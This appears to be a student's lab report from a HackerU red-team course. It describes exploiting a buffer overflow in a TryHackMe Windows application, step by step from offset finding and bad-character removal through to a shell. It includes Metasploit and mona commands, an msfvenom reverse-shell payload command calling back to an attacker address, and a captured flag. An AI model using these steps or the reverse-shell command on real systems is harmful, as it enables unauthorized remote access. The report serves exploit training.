Testing Organization

Buffer Overflow Red Team Batch 3

BOF_E2
Tester’s Name
M S V S Pavan

TryHackme ID
pavanmsvs

Test Date
10/07/2021

Copyright © 1996-2021 HackerU Ltd.

All Rights Reserved.
PURPOSE OF TESTING

Our purpose of this testing was to find vulnerability in the given application and using the vulnerability gain user
access.

TOOLS USED TO FIND THE SYSTEM AND VULNERABILITY

Nmap used to check at which port the application is running. Msfvenom to create payload metasploit-
framework tool to find offset value, pattern-creation.

GATHERING INFORMATION OF TARGET SYSTEM AND FINDING VULNERABILITY.

We have to connect VPN to get access to THM

From nmap scan we can see that port 8888 is open and our application is running on that port. We are already
provided with a skeleton of the code we have to use that skeleton and modify it to gain user access. From other
port at bin directory we got the vulnerable application, downloaded it and transferred it to our testing machine
where we will test our code and try to gain user access

Page 2
Page 3
We got the Skelton from the TryHackMe

Now, Extract the downloaded zip file into the windows system and start the application

Page 4
EXPLOITING THE TARGET

Now will start our testing in local development system by using the skeleton

Use the skeleton just modified the IP as shown with that of my local testing system. Now start and application
and run the crash.py to see whether the application is crashed or not

Page 5
As the application crashed from 6000 “A” sent to it will create a pattern of that and will try crash attack once
more with our pattern to get the offset value

For this will have to use metasploit tool pattern_create.rb this script will create a random char pattern of the
length specified by us.

/usr/share/metasploit-framework/tools/exploitpattern_create.rb -l 500

-l --> length of the pattern

Now will put this pattern character in place of “A” in our skeleton

Now we created the code with our pattern of 500 length and will execute this to get the offset value (exact
crash point of the application).

Page 6
After executing our code we see that we got EIP value which will use to find the offset of the application, and at
ESP address we can see our pattern is seen. For finding the offset we will use another metasploit tool
pattern_offset.rb this will give the application offset value.

As seen above using the EIP value we found the offset of the application which is 146.. Now will use this value in
our code to control the EIP

Will use the skeleton with the offset value in it and pass “B” extra character to get EIP control.

Page 7
As seen at EIP we got our extra passed character’s ASCII value i.e. 42424242. AS we have controlled the EIP will
now find the bad character in the application. For this will use the built in Mona module of immunity debugger.
Will configure a log folder first and then will create a bytearray using Mona module

!mona config -set workingfolder c:\logs\%p --> to configure log folder

!mona bytearray --> create bad char

Page 8
Once we created the bad character using mona will copy this in our code and execute it

We can simply add this as bad and add to buffer or we can pass it as buff value after the given value of skeleton.
Once we execute our code we will get the bad character present in the application which we have to remove.

We got the ESP value and using mona module we will compare the bytearray.bin file

Page 9
!mona compare -f c:\logs\minishare\bytearray.bin –a 032638D0

For finding the bad character we used this mona command and have to see the proper ESP value in register. We
can see that it saying corruption after 1 byte will remove first character from the bytearray and again execute
the code. To remove the first bad character form log will use mona command

!mona bytearray -b "\x00"

Similarly will remove the bad character from our code as well and will execute to see if any other bad character
present in our code

Page 10
Page 11
We can see that it saying corruption after 0 bytes will remove that character from the bytearray and again
execute the code. To remove the bad character form log will use mona command.

!mona bytearray -b "\x00\x0d"

Similarly will remove the bad character from our code as well and will execute to see if any other bad character
present in our code

Page 12
On executing our code after removing the bad character we again compare it using mona command and we find
that the status is unmodified which means our application don’t have any more bad character

(Note: - The jump ESP address should be taken properly as it changes)

If we try directly we are unable to find the JMP ESP value using mona modules but in the TryHackMe they gave
a hint

There is another application that is running with user32.dll

Page 13
Now we are set to create our payload using msfvenom to gain user control and get the shell access of the
testing system.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.118 lport=4444 -b "\x00\x0a" -f python

-p --> payload used (here used tcp-reverse shell)

Lhost --> local host (our system IP)

Lport --> (the port at which we want to get the shell)

- b --> bad character to be removed from our payload copying this buf value in our code and changing it as per
the skeleton provided, and adding the ESP value and NOPs padding. Padding = "\x90" * 16.
Page 14
Now before executing this code will have to open listener at port 4444 which we gave as lport in our payload
using net cat to get the shell

Page 15
On executing our shell code got the local system shell thus we successfully created a shell code which gave the
local system access now will create payload for the THM machine as we are connected with VPN will use tun0 ip
in payload and change the target IP in our code.

Page 16
Page 17
Minishare_proof.txt flag: - BD87238361767F91DB548CD0FD8CA8A09BB664E5A

We successfully got user access of the system and got the flag, Submitted the flag in THM

Page 18
Page 19